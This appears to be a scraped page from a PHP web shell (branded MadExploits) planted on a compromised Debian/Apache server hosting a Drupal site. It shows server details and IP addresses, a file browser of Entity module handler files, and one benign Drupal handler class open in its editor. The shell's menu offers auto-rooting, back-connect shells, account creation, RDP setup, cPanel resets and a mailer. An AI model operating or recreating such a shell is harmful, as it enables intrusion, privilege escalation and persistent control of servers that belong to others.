Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.141.192.174
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
entity /
views /
handlers /
[ HOME SHELL ]
Name
Size
Permission
Action
entity_views_field_handler_hel...
18.4
KB
-rw-r--r--
entity_views_handler_area_enti...
3.86
KB
-rw-r--r--
entity_views_handler_field_boo...
2.28
KB
-rw-r--r--
entity_views_handler_field_dat...
2.27
KB
-rw-r--r--
entity_views_handler_field_dur...
3.81
KB
-rw-r--r--
entity_views_handler_field_ent...
6.01
KB
-rw-r--r--
entity_views_handler_field_fie...
3.01
KB
-rw-r--r--
entity_views_handler_field_num...
2.27
KB
-rw-r--r--
entity_views_handler_field_opt...
3.27
KB
-rw-r--r--
entity_views_handler_field_tex...
2.33
KB
-rw-r--r--
entity_views_handler_field_uri...
2.3
KB
-rw-r--r--
entity_views_handler_relations...
1.63
KB
-rw-r--r--
entity_views_handler_relations...
3.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : entity_views_handler_relationship.inc
<?php /** * @file * Contains the entity_views_handler_relationship class. */ /** * Relationship handler for data selection tables. * * This handler may only be used in conjunction with data selection based Views * tables or other base tables using a query plugin that supports data * selection. * * @see entity_views_field_definition() * @ingroup views_field_handlers */ class entity_views_handler_relationship extends views_handler_relationship { /** * Slightly modify the options form provided by the parent handler. */ public function options_form(&$form, &$form_state) { parent::options_form($form, $form_state); // This won't work with data selector-based relationships, as we only // inspect those *after* the results are known. $form['required']['#access'] = FALSE; // Notify the user of our restrictions regarding lists of entities, if // appropriate. if (!empty($this->definition['multiple'])) { $form['multiple_note'] = array( '#markup' => t('<strong>Note:</strong> This is a multi-valued relationship, which is currently not supported. ' . 'Only the first related entity will be shown.'), '#weight' => -5, ); } } /** * Called to implement a relationship in a query. * * As we don't add any data to the query itself, we don't have to do anything * here. Views just don't thinks we have been called unless we set our * $alias property. Otherwise, this override is just here to keep PHP from * blowing up by calling inexistent methods on the query plugin. */ public function query() { $this->alias = $this->options['id']; } }
Close